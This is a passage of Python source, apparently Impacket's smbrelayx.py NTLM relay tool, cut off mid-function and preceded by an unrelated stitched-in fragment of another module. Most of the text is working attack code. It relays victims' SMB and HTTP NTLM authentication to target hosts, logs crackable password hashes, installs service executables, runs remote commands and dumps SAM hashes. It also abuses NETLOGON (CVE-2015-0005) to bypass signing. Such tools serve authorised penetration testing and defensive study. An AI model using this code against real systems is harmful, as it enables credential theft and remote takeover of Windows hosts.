Return the object's attributes as a dictionary.
:param attributes_to_delete: set of attribute names that should be deleted.
:return: a copy of the object's __dict__ (attribute deletion is not applied yet).
"""
pt("object", object)
dict_copy = object.__dict__.copy() # Need to be a copy to not get original class' attributes.
return dict_copy
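# Hedged usage sketch (not part of the original module): dispatching a
# function to a background thread; `long_running_task` and its arguments are
# hypothetical.
#
#     def long_running_task(path, retries=3):
#         ...
#
#     execute_asynchronous_thread(long_running_task,
#                                 arguments=("/tmp/data",),
#                                 kwargs={"retries": 5})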
|
smbrelayx.py
|
#!/opt/impacket-impacket_0_9_20/bin/python3
# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
#
# This software is provided under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# SMB Relay Module
#
# Author:
# Alberto Solino (@agsolino)
#
# Description:
# This module performs the SMB Relay attacks originally discovered
# by cDc. It receives a list of targets and for every connection received it
# will choose the next target and try to relay the credentials. Also, if
# specified, it will first try to authenticate against the client connecting
# to us.
#
# It is implemented by invoking an SMB and HTTP server, hooking a few
# functions and then using the smbclient portion. It is supposed to work
# on any LM Compatibility level. The only way to stop this attack
# is to enforce SPN checks and/or signing on the server.
#
# If the target system is enforcing signing and a machine account was provided,
# the module will try to gather the SMB session key through
# NETLOGON (CVE-2015-0005)
#
# If the authentication against the target succeeds, the client authentication
# succeeds as well and a valid connection is set up against the local smbserver.
# It's up to the user to set up the local smbserver functionality. One option
# is to set up shares with whatever files you want so the victim thinks it's
# connected to a valid SMB server. All that is done through the smb.conf file or
# programmatically.
#
from __future__ import division
from __future__ import print_function
try:
import ConfigParser
except ImportError:
import configparser as ConfigParser
import http.server
import socketserver
import argparse
import base64
import logging
import os
import sys
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse
from binascii import unhexlify, hexlify
from struct import pack, unpack
from threading import Thread
from six import PY2
from impacket import version
from impacket.dcerpc.v5 import nrpc
from impacket.dcerpc.v5 import transport
from impacket.dcerpc.v5.ndr import NULL
from impacket.dcerpc.v5.rpcrt import DCERPCException
from impacket.examples import logger
from impacket.examples import serviceinstall
from impacket.examples.ntlmrelayx.servers.socksserver import activeConnections, SOCKS
from impacket.examples.ntlmrelayx.clients.smbrelayclient import SMBRelayClient
from impacket.nt_errors import ERROR_MESSAGES
from impacket.nt_errors import STATUS_LOGON_FAILURE, STATUS_SUCCESS, STATUS_ACCESS_DENIED, STATUS_NOT_SUPPORTED, \
STATUS_MORE_PROCESSING_REQUIRED
from impacket.ntlm import NTLMAuthChallengeResponse, NTLMAuthNegotiate, NTLMAuthChallenge, AV_PAIRS, \
NTLMSSP_AV_HOSTNAME, generateEncryptedSessionKey
from impacket.smb import NewSMBPacket, SMBCommand, SMB, SMBSessionSetupAndX_Data, SMBSessionSetupAndX_Extended_Data, \
SMBSessionSetupAndX_Extended_Response_Parameters, SMBSessionSetupAndX_Extended_Response_Data, \
SMBSessionSetupAndX_Parameters, SMBSessionSetupAndX_Extended_Parameters, TypesMech, \
SMBSessionSetupAndXResponse_Parameters, SMBSessionSetupAndXResponse_Data
from impacket.smb3 import SMB3
from impacket.smbconnection import SMBConnection
from impacket.smbserver import outputToJohnFormat, writeJohnOutputToFile, SMBSERVER
from impacket.spnego import ASN1_AID, SPNEGO_NegTokenResp, SPNEGO_NegTokenInit
try:
from Cryptodome.Cipher import DES, AES, ARC4
except Exception:
logging.critical("Warning: You don't have any crypto installed. You need pycryptodomex")
logging.critical("See https://pypi.org/project/pycryptodomex/")
# Global Variables
# This is the list of hosts that have been attacked already in case -one-shot was chosen
ATTACKED_HOSTS = set()
CODEC = sys.getdefaultencoding()
class doAttack(Thread):
def __init__(self, SMBClient, exeFile, command):
Thread.__init__(self)
if isinstance(SMBClient, SMB) or isinstance(SMBClient, SMB3):
self.__SMBConnection = SMBConnection(existingConnection = SMBClient)
else:
self.__SMBConnection = SMBClient
self.__exeFile = exeFile
self.__command = command
self.__answerTMP = b''
if exeFile is not None:
self.installService = serviceinstall.ServiceInstall(SMBClient, exeFile)
def __answer(self, data):
self.__answerTMP += data
def run(self):
# Here PUT YOUR CODE!
global ATTACKED_HOSTS
if self.__exeFile is not None:
result = self.installService.install()
if result is True:
logging.info("Service Installed.. CONNECT!")
self.installService.uninstall()
else:
ATTACKED_HOSTS.remove(self.__SMBConnection.getRemoteHost())
else:
from impacket.examples.secretsdump import RemoteOperations, SAMHashes
samHashes = None
try:
# We have to add some flags just in case the original client did not
# Why? needed for avoiding INVALID_PARAMETER
flags1, flags2 = self.__SMBConnection.getSMBServer().get_flags()
flags2 |= SMB.FLAGS2_LONG_NAMES
self.__SMBConnection.getSMBServer().set_flags(flags2=flags2)
remoteOps = RemoteOperations(self.__SMBConnection, False)
remoteOps.enableRegistry()
except Exception as e:
logging.debug('Exception:', exc_info=True)
# Something went wrong; most probably we don't have admin access. Aborting.
logging.error(str(e))
ATTACKED_HOSTS.remove(self.__SMBConnection.getRemoteHost())
return
try:
if self.__command is not None:
remoteOps._RemoteOperations__executeRemote(self.__command)
logging.info("Executed specified command on host: %s", self.__SMBConnection.getRemoteHost())
self.__answerTMP = b''
self.__SMBConnection.getFile('ADMIN$', 'Temp\\__output', self.__answer)
logging.debug('Raw answer %r' % self.__answerTMP)
try:
print(self.__answerTMP.decode(CODEC))
except UnicodeDecodeError:
logging.error('Decoding error detected, consider running chcp.com at the target,\nmap the result with '
'https://docs.python.org/2.4/lib/standard-encodings.html\nand then execute wmiexec.py '
'again with -codec and the corresponding codec')
print(self.__answerTMP)
self.__SMBConnection.deleteFile('ADMIN$', 'Temp\\__output')
else:
bootKey = remoteOps.getBootKey()
remoteOps._RemoteOperations__serviceDeleted = True
samFileName = remoteOps.saveSAM()
samHashes = SAMHashes(samFileName, bootKey, isRemote = True)
samHashes.dump()
logging.info("Done dumping SAM hashes for host: %s", self.__SMBConnection.getRemoteHost())
except Exception as e:
logging.debug('Exception:', exc_info=True)
ATTACKED_HOSTS.remove(self.__SMBConnection.getRemoteHost())
logging.error(str(e))
finally:
if samHashes is not None:
samHashes.finish()
if remoteOps is not None:
remoteOps.finish()
try:
ATTACKED_HOSTS.remove(self.__SMBConnection.getRemoteHost())
except Exception as e:
logging.error(str(e))
pass
class SMBClient(SMB):
def __init__(self, remote_name, extended_security = True, sess_port = 445):
self._extendedSecurity = extended_security
self.domainIp = None
self.machineAccount = None
self.machineHashes = None
SMB.__init__(self,remote_name, remote_name, sess_port = sess_port)
def neg_session(self):
neg_sess = SMB.neg_session(self, extended_security = self._extendedSecurity)
return neg_sess
def setUid(self,uid):
self._uid = uid
def login_standard(self, user, domain, ansiPwd, unicodePwd):
smb = NewSMBPacket()
smb['Flags1'] = 8
sessionSetup = SMBCommand(SMB.SMB_COM_SESSION_SETUP_ANDX)
sessionSetup['Parameters'] = SMBSessionSetupAndX_Parameters()
sessionSetup['Data'] = SMBSessionSetupAndX_Data()
sessionSetup['Parameters']['MaxBuffer'] = 65535
sessionSetup['Parameters']['MaxMpxCount'] = 2
sessionSetup['Parameters']['VCNumber'] = os.getpid()
sessionSetup['Parameters']['SessionKey'] = self._dialects_parameters['SessionKey']
sessionSetup['Parameters']['AnsiPwdLength'] = len(ansiPwd)
sessionSetup['Parameters']['UnicodePwdLength'] = len(unicodePwd)
sessionSetup['Parameters']['Capabilities'] = SMB.CAP_RAW_MODE
sessionSetup['Data']['AnsiPwd'] = ansiPwd
sessionSetup['Data']['UnicodePwd'] = unicodePwd
sessionSetup['Data']['Account'] = user
sessionSetup['Data']['PrimaryDomain'] = domain
sessionSetup['Data']['NativeOS'] = 'Unix'
sessionSetup['Data']['NativeLanMan'] = 'Samba'
smb.addCommand(sessionSetup)
self.sendSMB(smb)
smb = self.recvSMB()
try:
smb.isValidAnswer(SMB.SMB_COM_SESSION_SETUP_ANDX)
except:
logging.error("Error login_standard")
return None, STATUS_LOGON_FAILURE
else:
self._uid = smb['Uid']
return smb, STATUS_SUCCESS
def setDomainAccount( self, machineAccount, machineHashes, domainIp):
self.machineAccount = machineAccount
self.machineHashes = machineHashes
self.domainIp = domainIp
if self._SignatureRequired is True:
if self.domainIp is None:
logging.error("Signature is REQUIRED on the other end, attack will not work")
else:
logging.info("Signature is REQUIRED on the other end, using NETLOGON approach")
def netlogonSessionKey(self, challenge, authenticateMessageBlob):
# Here we will use netlogon to get the signing session key
logging.info("Connecting to %s NETLOGON service" % self.domainIp)
respToken2 = SPNEGO_NegTokenResp(authenticateMessageBlob)
authenticateMessage = NTLMAuthChallengeResponse()
authenticateMessage.fromString(respToken2['ResponseToken'] )
_, machineAccount = self.machineAccount.split('/')
domainName = authenticateMessage['domain_name'].decode('utf-16le')
try:
av_pairs = authenticateMessage['ntlm'][44:]
av_pairs = AV_PAIRS(av_pairs)
serverName = av_pairs[NTLMSSP_AV_HOSTNAME][1].decode('utf-16le')
except:
logging.debug("Exception:", exc_info=True)
# We're in NTLMv1, not supported
return STATUS_ACCESS_DENIED
stringBinding = r'ncacn_np:%s[\PIPE\netlogon]' % self.domainIp
rpctransport = transport.DCERPCTransportFactory(stringBinding)
if len(self.machineHashes) > 0:
lmhash, nthash = self.machineHashes.split(':')
else:
lmhash = ''
nthash = ''
if hasattr(rpctransport, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransport.set_credentials(machineAccount,'', domainName, lmhash, nthash)
dce = rpctransport.get_dce_rpc()
dce.connect()
dce.bind(nrpc.MSRPC_UUID_NRPC)
resp = nrpc.hNetrServerReqChallenge(dce, NULL, serverName+'\x00', '12345678')
serverChallenge = resp['ServerChallenge']
if self.machineHashes == '':
ntHash = None
else:
ntHash = unhexlify(self.machineHashes.split(':')[1])
sessionKey = nrpc.ComputeSessionKeyStrongKey('', '12345678', serverChallenge, ntHash)
ppp = nrpc.ComputeNetlogonCredential('12345678', sessionKey)
nrpc.hNetrServerAuthenticate3(dce, NULL, machineAccount + '\x00',
nrpc.NETLOGON_SECURE_CHANNEL_TYPE.WorkstationSecureChannel, serverName + '\x00',
ppp, 0x600FFFFF)
clientStoredCredential = pack('<Q', unpack('<Q',ppp)[0] + 10)
# Now let's try to verify the security blob against the PDC
request = nrpc.NetrLogonSamLogonWithFlags()
request['LogonServer'] = '\x00'
request['ComputerName'] = serverName + '\x00'
request['ValidationLevel'] = nrpc.NETLOGON_VALIDATION_INFO_CLASS.NetlogonValidationSamInfo4
request['LogonLevel'] = nrpc.NETLOGON_LOGON_INFO_CLASS.NetlogonNetworkTransitiveInformation
request['LogonInformation']['tag'] = nrpc.NETLOGON_LOGON_INFO_CLASS.NetlogonNetworkTransitiveInformation
request['LogonInformation']['LogonNetworkTransitive']['Identity']['LogonDomainName'] = domainName
request['LogonInformation']['LogonNetworkTransitive']['Identity']['ParameterControl'] = 0
request['LogonInformation']['LogonNetworkTransitive']['Identity']['UserName'] = authenticateMessage[
'user_name'].decode('utf-16le')
request['LogonInformation']['LogonNetworkTransitive']['Identity']['Workstation'] = ''
request['LogonInformation']['LogonNetworkTransitive']['LmChallenge'] = challenge
request['LogonInformation']['LogonNetworkTransitive']['NtChallengeResponse'] = authenticateMessage['ntlm']
request['LogonInformation']['LogonNetworkTransitive']['LmChallengeResponse'] = authenticateMessage['lanman']
authenticator = nrpc.NETLOGON_AUTHENTICATOR()
authenticator['Credential'] = nrpc.ComputeNetlogonCredential(clientStoredCredential, sessionKey)
authenticator['Timestamp'] = 10
request['Authenticator'] = authenticator
request['ReturnAuthenticator']['Credential'] = '\x00'*8
request['ReturnAuthenticator']['Timestamp'] = 0
request['ExtraFlags'] = 0
#request.dump()
try:
resp = dce.request(request)
#resp.dump()
except DCERPCException as e:
logging.debug('Exception:', exc_info=True)
logging.error(str(e))
return e.get_error_code()
logging.info("%s\\%s successfully validated through NETLOGON" % (
domainName, authenticateMessage['user_name'].decode('utf-16le')))
encryptedSessionKey = authenticateMessage['session_key']
if encryptedSessionKey != '':
signingKey = generateEncryptedSessionKey(
resp['ValidationInformation']['ValidationSam4']['UserSessionKey'], encryptedSessionKey)
else:
signingKey = resp['ValidationInformation']['ValidationSam4']['UserSessionKey']
logging.info("SMB Signing key: %s " % hexlify(signingKey))
self.set_session_key(signingKey)
self._SignatureEnabled = True
self._SignSequenceNumber = 2
self.set_flags(flags1 = SMB.FLAGS1_PATHCASELESS, flags2 = SMB.FLAGS2_EXTENDED_SECURITY)
return STATUS_SUCCESS
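# Summary of the NETLOGON approach above (descriptive note only): the relayed
# AUTHENTICATE message is re-validated against the DC with NetrLogonSamLogonWithFlags
# over a secure channel built from the machine account hashes; the UserSessionKey
# returned in the validation data then yields the SMB signing key (either directly,
# or by decrypting the session key the client exchanged).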
def sendAuth(self, serverChallenge, authenticateMessageBlob):
smb = NewSMBPacket()
smb['Flags1'] = SMB.FLAGS1_PATHCASELESS
smb['Flags2'] = SMB.FLAGS2_EXTENDED_SECURITY
# Are we required to sign SMB? If so we do it, if not we skip it
if self._SignatureRequired:
smb['Flags2'] |= SMB.FLAGS2_SMB_SECURITY_SIGNATURE
smb['Uid'] = self._uid
sessionSetup = SMBCommand(SMB.SMB_COM_SESSION_SETUP_ANDX)
sessionSetup['Parameters'] = SMBSessionSetupAndX_Extended_Parameters()
sessionSetup['Data'] = SMBSessionSetupAndX_Extended_Data()
sessionSetup['Parameters']['MaxBufferSize'] = 65535
sessionSetup['Parameters']['MaxMpxCount'] = 2
sessionSetup['Parameters']['VcNumber'] = 1
sessionSetup['Parameters']['SessionKey'] = 0
sessionSetup['Parameters']['Capabilities'] = SMB.CAP_EXTENDED_SECURITY | SMB.CAP_USE_NT_ERRORS | SMB.CAP_UNICODE
# Fake Data here, don't want to get us fingerprinted
sessionSetup['Data']['NativeOS'] = 'Unix'
sessionSetup['Data']['NativeLanMan'] = 'Samba'
sessionSetup['Parameters']['SecurityBlobLength'] = len(authenticateMessageBlob)
sessionSetup['Data']['SecurityBlob'] = authenticateMessageBlob
smb.addCommand(sessionSetup)
self.sendSMB(smb)
smb = self.recvSMB()
errorCode = smb['ErrorCode'] << 16
errorCode += smb['_reserved'] << 8
errorCode += smb['ErrorClass']
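# Worked example (illustrative): STATUS_MORE_PROCESSING_REQUIRED is 0xC0000016, which
# arrives split as ErrorCode=0xC000, _reserved=0x00 and ErrorClass=0x16, so
# (0xC000 << 16) + (0x00 << 8) + 0x16 reassembles the 32-bit NT status.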
if errorCode == STATUS_SUCCESS and self._SignatureRequired is True and self.domainIp is not None:
try:
errorCode = self.netlogonSessionKey(serverChallenge, authenticateMessageBlob)
except:
logging.debug('Exception:', exc_info=True)
raise
return smb, errorCode
def sendNegotiate(self, negotiateMessage):
smb = NewSMBPacket()
smb['Flags1'] = SMB.FLAGS1_PATHCASELESS
smb['Flags2'] = SMB.FLAGS2_EXTENDED_SECURITY
# Are we required to sign SMB? If so we do it, if not we skip it
if self._SignatureRequired:
smb['Flags2'] |= SMB.FLAGS2_SMB_SECURITY_SIGNATURE
sessionSetup = SMBCommand(SMB.SMB_COM_SESSION_SETUP_ANDX)
sessionSetup['Parameters'] = SMBSessionSetupAndX_Extended_Parameters()
sessionSetup['Data'] = SMBSessionSetupAndX_Extended_Data()
sessionSetup['Parameters']['MaxBufferSize'] = 65535
sessionSetup['Parameters']['MaxMpxCount'] = 2
sessionSetup['Parameters']['VcNumber'] = 1
sessionSetup['Parameters']['SessionKey'] = 0
sessionSetup['Parameters']['Capabilities'] = SMB.CAP_EXTENDED_SECURITY | SMB.CAP_USE_NT_ERRORS | SMB.CAP_UNICODE
# Let's build a NegTokenInit with the NTLMSSP
# TODO: In the future we should be able to choose different providers
blob = SPNEGO_NegTokenInit()
# NTLMSSP
blob['MechTypes'] = [TypesMech['NTLMSSP - Microsoft NTLM Security Support Provider']]
blob['MechToken'] = negotiateMessage
sessionSetup['Parameters']['SecurityBlobLength'] = len(blob)
sessionSetup['Parameters'].getData()
sessionSetup['Data']['SecurityBlob'] = blob.getData()
# Fake Data here, don't want to get us fingerprinted
sessionSetup['Data']['NativeOS'] = 'Unix'
sessionSetup['Data']['NativeLanMan'] = 'Samba'
smb.addCommand(sessionSetup)
self.sendSMB(smb)
smb = self.recvSMB()
try:
smb.isValidAnswer(SMB.SMB_COM_SESSION_SETUP_ANDX)
except Exception:
logging.error("SessionSetup Error!")
raise
else:
# We will need to use this uid field for all future requests/responses
self._uid = smb['Uid']
# Now we have to extract the blob to continue the auth process
sessionResponse = SMBCommand(smb['Data'][0])
sessionParameters = SMBSessionSetupAndX_Extended_Response_Parameters(sessionResponse['Parameters'])
sessionData = SMBSessionSetupAndX_Extended_Response_Data(flags = smb['Flags2'])
sessionData['SecurityBlobLength'] = sessionParameters['SecurityBlobLength']
sessionData.fromString(sessionResponse['Data'])
respToken = SPNEGO_NegTokenResp(sessionData['SecurityBlob'])
return respToken['ResponseToken']
class HTTPRelayServer(Thread):
class HTTPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
def __init__(self, server_address, RequestHandlerClass, target, exeFile, command, mode, outputFile,
one_shot, returnStatus=STATUS_SUCCESS, runSocks = False):
self.target = target
self.exeFile = exeFile
self.command = command
self.mode = mode
self.returnStatus = returnStatus
self.outputFile = outputFile
self.one_shot = one_shot
self.runSocks = runSocks
socketserver.TCPServer.__init__(self,server_address, RequestHandlerClass)
class HTTPHandler(http.server.SimpleHTTPRequestHandler):
def __init__(self,request, client_address, server):
self.server = server
self.protocol_version = 'HTTP/1.1'
self.challengeMessage = None
self.target = None
self.client = None
self.machineAccount = None
self.machineHashes = None
self.domainIp = None
global ATTACKED_HOSTS
if self.server.target in ATTACKED_HOSTS and self.server.one_shot:
logging.info(
"HTTPD: Received connection from %s, skipping %s, already attacked" % (
client_address[0], self.server.target))
return
if self.server.target is not None:
logging.info(
"HTTPD: Received connection from %s, attacking target %s" % (client_address[0], self.server.target))
else:
logging.info(
"HTTPD: Received connection from %s, attacking target %s" % (client_address[0], client_address[0]))
http.server.SimpleHTTPRequestHandler.__init__(self,request, client_address, server)
def handle_one_request(self):
try:
http.server.SimpleHTTPRequestHandler.handle_one_request(self)
except Exception:
logging.debug("Exception:", exc_info=True)
pass
def log_message(self, format, *args):
return
def do_HEAD(self):
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
def do_AUTHHEAD(self, message = ''):
self.send_response(401)
self.send_header('WWW-Authenticate', message.decode('utf-8'))
self.send_header('Content-type', 'text/html')
self.send_header('Content-Length','0')
self.end_headers()
def send_error(self, code, message=None):
if message.find('RPC_OUT') >= 0 or message.find('RPC_IN') >= 0:
return self.do_GET()
return http.server.SimpleHTTPRequestHandler.send_error(self,code,message)
def do_GET(self):
messageType = 0
if PY2:
authorizationHeader = self.headers.getheader('Authorization')
else:
authorizationHeader = self.headers.get('Authorization')
if authorizationHeader is None:
self.do_AUTHHEAD(message = b'NTLM')
pass
else:
#self.do_AUTHHEAD()
typeX = authorizationHeader
try:
_, blob = typeX.split('NTLM')
token = base64.b64decode(blob.strip())
except:
self.do_AUTHHEAD()
return
messageType = unpack('<L',token[len('NTLMSSP\x00'):len('NTLMSSP\x00')+4])[0]
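# NTLMSSP message types (for reference): 1 = NEGOTIATE (client opens the handshake),
# 2 = CHALLENGE (issued by the server/target), 3 = AUTHENTICATE (client's final response).
# Only types 1 and 3 are expected from the victim here; the CHALLENGE is obtained by
# relaying the type 1 message to the target below.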
if messageType == 1:
if self.server.mode.upper() == 'REFLECTION':
self.target = self.client_address[0]
else:
self.target = self.server.target
try:
if self.client is not None:
logging.error('Still performing an attack against %s' % self.client.get_remote_host())
self.send_response(404)
self.end_headers()
return
self.client = SMBClient(self.target, extended_security = True)
self.client.setDomainAccount(self.machineAccount, self.machineHashes, self.domainIp)
self.client.set_timeout(60)
except Exception as e:
logging.error("Connection against target %s FAILED" % self.target)
logging.error(str(e))
clientChallengeMessage = self.client.sendNegotiate(token)
self.challengeMessage = NTLMAuthChallenge()
self.challengeMessage.fromString(clientChallengeMessage)
self.do_AUTHHEAD(message = b'NTLM '+base64.b64encode(clientChallengeMessage))
elif messageType == 3:
authenticateMessage = NTLMAuthChallengeResponse()
authenticateMessage.fromString(token)
if authenticateMessage['user_name'] != '' or self.target == '127.0.0.1':
respToken2 = SPNEGO_NegTokenResp()
respToken2['ResponseToken'] = token
clientResponse, errorCode = self.client.sendAuth(self.challengeMessage['challenge'],
respToken2.getData())
else:
# Anonymous login, send STATUS_ACCESS_DENIED so we force the client to send its credentials,
# except when coming from localhost
errorCode = STATUS_ACCESS_DENIED
if errorCode != STATUS_SUCCESS:
logging.error("Authenticating against %s as %s\\%s FAILED" % (
self.target, authenticateMessage['domain_name'].decode('utf-16le'), authenticateMessage['user_name'].decode('utf-16le')))
self.do_AUTHHEAD(b'NTLM')
else:
# Relay worked, do whatever we want here...
logging.info("Authenticating against %s as %s\\%s SUCCEED" % (
self.target, authenticateMessage['domain_name'].decode('utf-16le'), authenticateMessage['user_name'].decode('utf-16le')))
ntlm_hash_data = outputToJohnFormat(self.challengeMessage['challenge'],
authenticateMessage['user_name'],
authenticateMessage['domain_name'],
authenticateMessage['lanman'], authenticateMessage['ntlm'])
logging.info(ntlm_hash_data['hash_string'])
if self.server.outputFile is not None:
writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'],
self.server.outputFile)
# Target will be attacked, adding to the attacked set
# If the attack fails, the doAttack thread will be responsible for removing it from the set
global ATTACKED_HOSTS
if self.target not in ATTACKED_HOSTS:
ATTACKED_HOSTS.add(self.target)
if self.server.runSocks is True:
# Pass all the data to the socksplugins proxy
protocolClient = SMBRelayClient(None,urlparse('smb://%s' % self.target))
protocolClient.session = SMBConnection(existingConnection=self.client)
activeConnections.put(
(self.target, 445, 'SMB', ('%s/%s' % (
authenticateMessage['domain_name'].decode('utf-16le'),
authenticateMessage['user_name'].decode('utf-16le'))).upper(),
protocolClient,
{'CHALLENGE_MESSAGE': self.challengeMessage}))
logging.info("Adding %s(445) to active SOCKS connection. Enjoy" % self.target)
else:
clientThread = doAttack(self.client,self.server.exeFile,self.server.command)
self.client = None
clientThread.start()
else:
logging.error('%s is being attacked at the moment, skipping... ' % self.target)
# And answer 404 not found
self.send_response(404)
self.send_header('WWW-Authenticate', 'NTLM')
self.send_header('Content-type', 'text/html')
self.send_header('Content-Length','0')
self.end_headers()
return
def __init__(self, outputFile=None):
Thread.__init__(self)
self.daemon = True
self.domainIp = None
self.machineAccount = None
self.machineHashes = None
self.exeFile = None
self.command = None
self.target = None
self.mode = None
self.outputFile = outputFile
self.one_shot = False
self.runSocks = False
def setTargets(self, target):
self.target = target
def setExeFile(self, filename):
self.exeFile = filename
def setCommand(self, command):
self.command = command
def setSocks(self, socks):
self.runSocks = socks
def setReturnStatus(self, returnStatus):
# Not implemented yet.
pass
def setMode(self,mode, one_shot):
self.mode = mode
self.one_shot = one_shot
def setDomainAccount( self, machineAccount, machineHashes, domainIp):
self.machineAccount = machineAccount
self.machineHashes = machineHashes
self.domainIp = domainIp
def run(self):
logging.info("Setting up HTTP Server")
httpd = self.HTTPServer(("", 80), self.HTTPHandler, self.target, self.exeFile, self.command, self.mode,
self.outputFile, self.one_shot, runSocks = self.runSocks)
httpd.serve_forever()
class SMBRelayServer(Thread):
def __init__(self, outputFile = None):
Thread.__init__(self)
self.daemon = True
self.server = 0
self.target = ''
self.mode = 'REFLECTION'
self.domainIp = None
self.machineAccount = None
self.machineHashes = None
self.exeFile = None
self.returnStatus = STATUS_SUCCESS
self.command = None
self.one_shot = False
self.runSocks = False
# Here we write a mini config for the server
smbConfig = ConfigParser.ConfigParser()
smbConfig.add_section('global')
smbConfig.set('global','server_name','server_name')
smbConfig.set('global','server_os','UNIX')
smbConfig.set('global','server_domain','WORKGROUP')
smbConfig.set('global','log_file','smb.log')
smbConfig.set('global','credentials_file','')
if outputFile is not None:
smbConfig.set('global','jtr_dump_path',outputFile)
# IPC always needed
smbConfig.add_section('IPC$')
smbConfig.set('IPC$','comment','')
smbConfig.set('IPC$','read only','yes')
smbConfig.set('IPC$','share type','3')
smbConfig.set('IPC$','path','')
self.server = SMBSERVER(('0.0.0.0',445), config_parser = smbConfig)
self.server.processConfigFile()
self.origSmbComNegotiate = self.server.hookSmbCommand(SMB.SMB_COM_NEGOTIATE, self.SmbComNegotiate)
self.origSmbSessionSetupAndX = self.server.hookSmbCommand(SMB.SMB_COM_SESSION_SETUP_ANDX,
self.SmbSessionSetupAndX)
# Let's use the SMBServer Connection dictionary to keep track of our client connections as well
self.server.addConnection('SMBRelay', '0.0.0.0', 445)
def SmbComNegotiate(self, connId, smbServer, SMBCommand, recvPacket):
connData = smbServer.getConnectionData(connId, checkStatus = False)
if self.mode.upper() == 'REFLECTION':
self.target = connData['ClientIP']
#############################################################
# SMBRelay
smbData = smbServer.getConnectionData('SMBRelay', False)
if self.target in smbData:
# Remove the previous connection and use the last one
smbClient = smbData[self.target]['SMBClient']
del smbClient
del smbData[self.target]
# Let's check if we already attacked this host.
global ATTACKED_HOSTS
if self.target in ATTACKED_HOSTS and self.one_shot is True:
logging.info("SMBD: Received connection from %s, skipping %s, already attacked" % (
connData['ClientIP'], self.target))
packet = NewSMBPacket()
packet['Flags1'] = SMB.FLAGS1_REPLY
packet['Flags2'] = SMB.FLAGS2_NT_STATUS
packet['Command'] = recvPacket['Command']
packet['Pid'] = recvPacket['Pid']
packet['Tid'] = recvPacket['Tid']
packet['Mid'] = recvPacket['Mid']
packet['Uid'] = recvPacket['Uid']
packet['Data'] = b'\x00\x00\x00'
errorCode = STATUS_NOT_SUPPORTED
packet['ErrorCode'] = errorCode >> 16
packet['ErrorClass'] = errorCode & 0xff
return None, [packet], STATUS_NOT_SUPPORTED
else:
logging.info("SMBD: Received connection from %s, attacking target %s" % (connData['ClientIP'] ,self.target))
try:
if recvPacket['Flags2'] & SMB.FLAGS2_EXTENDED_SECURITY == 0:
extSec = False
else:
if self.mode.upper() == 'REFLECTION':
# Force standard security when doing reflection
logging.info("Downgrading to standard security")
extSec = False
recvPacket['Flags2'] &= ~SMB.FLAGS2_EXTENDED_SECURITY
else:
extSec = True
client = SMBClient(self.target, extended_security = extSec)
client.setDomainAccount(self.machineAccount, self.machineHashes, self.domainIp)
client.set_timeout(60)
except Exception as e:
logging.error("Connection against target %s FAILED" % self.target)
logging.error(str(e))
else:
encryptionKey = client.get_encryption_key()
smbData[self.target] = {}
smbData[self.target]['SMBClient'] = client
if encryptionKey is not None:
connData['EncryptionKey'] = encryptionKey
smbServer.setConnectionData('SMBRelay', smbData)
smbServer.setConnectionData(connId, connData)
return self.origSmbComNegotiate(connId, smbServer, SMBCommand, recvPacket)
#############################################################
def SmbSessionSetupAndX(self, connId, smbServer, smbCommand, recvPacket):
connData = smbServer.getConnectionData(connId, checkStatus = False)
#############################################################
# SMBRelay
smbData = smbServer.getConnectionData('SMBRelay', False)
#############################################################
respSMBCommand = SMBCommand(SMB.SMB_COM_SESSION_SETUP_ANDX)
global ATTACKED_HOSTS
if connData['_dialects_parameters']['Capabilities'] & SMB.CAP_EXTENDED_SECURITY:
# Extended security. Here we deal with all SPNEGO stuff
respParameters = SMBSessionSetupAndX_Extended_Response_Parameters()
respData = SMBSessionSetupAndX_Extended_Response_Data()
sessionSetupParameters = SMBSessionSetupAndX_Extended_Parameters(smbCommand['Parameters'])
sessionSetupData = SMBSessionSetupAndX_Extended_Data()
sessionSetupData['SecurityBlobLength'] = sessionSetupParameters['SecurityBlobLength']
sessionSetupData.fromString(smbCommand['Data'])
connData['Capabilities'] = sessionSetupParameters['Capabilities']
if unpack('B',sessionSetupData['SecurityBlob'][0:1])[0] != ASN1_AID:
# If there is no GSSAPI ID, it must be an AUTH packet
blob = SPNEGO_NegTokenResp(sessionSetupData['SecurityBlob'])
token = blob['ResponseToken']
else:
# NEGOTIATE packet
blob = SPNEGO_NegTokenInit(sessionSetupData['SecurityBlob'])
token = blob['MechToken']
# Here we only handle NTLMSSP, depending on what stage of the
# authentication we are, we act on it
messageType = unpack('<L',token[len('NTLMSSP\x00'):len('NTLMSSP\x00')+4])[0]
if messageType == 0x01:
# NEGOTIATE_MESSAGE
negotiateMessage = NTLMAuthNegotiate()
negotiateMessage.fromString(token)
# Let's store it in the connection data
connData['NEGOTIATE_MESSAGE'] = negotiateMessage
#############################################################
# SMBRelay: Ok.. So we got a NEGOTIATE_MESSAGE from a client.
# Let's send it to the target server and send the answer back to the client.
# Let's check if we already attacked this host.
global ATTACKED_HOSTS
if self.target in ATTACKED_HOSTS and self.one_shot is True:
logging.info("SMBD: Received connection from %s, skipping %s, already attacked" % (
connData['ClientIP'], self.target))
packet = NewSMBPacket()
packet['Flags1'] = SMB.FLAGS1_REPLY
packet['Flags2'] = SMB.FLAGS2_NT_STATUS
packet['Command'] = recvPacket['Command']
packet['Pid'] = recvPacket['Pid']
packet['Tid'] = recvPacket['Tid']
packet['Mid'] = recvPacket['Mid']
packet['Uid'] = recvPacket['Uid']
packet['Data'] = b'\x00\x00\x00'
errorCode = STATUS_NOT_SUPPORTED
packet['ErrorCode'] = errorCode >> 16
packet['ErrorClass'] = errorCode & 0xff
return None, [packet], STATUS_NOT_SUPPORTED
# If the target connects back before a previous connection has finished, we might
# reach this function without the dict and SMBClient entry having been created,
# because a NEGOTIATE_CONNECTION was not needed
if (self.target in smbData) is False:
smbData[self.target] = {}
smbClient = SMBClient(self.target)
smbClient.setDomainAccount(self.machineAccount, self.machineHashes, self.domainIp)
smbClient.set_timeout(60)
smbData[self.target]['SMBClient'] = smbClient
smbClient = smbData[self.target]['SMBClient']
clientChallengeMessage = smbClient.sendNegotiate(token)
challengeMessage = NTLMAuthChallenge()
challengeMessage.fromString(clientChallengeMessage)
#############################################################
respToken = SPNEGO_NegTokenResp()
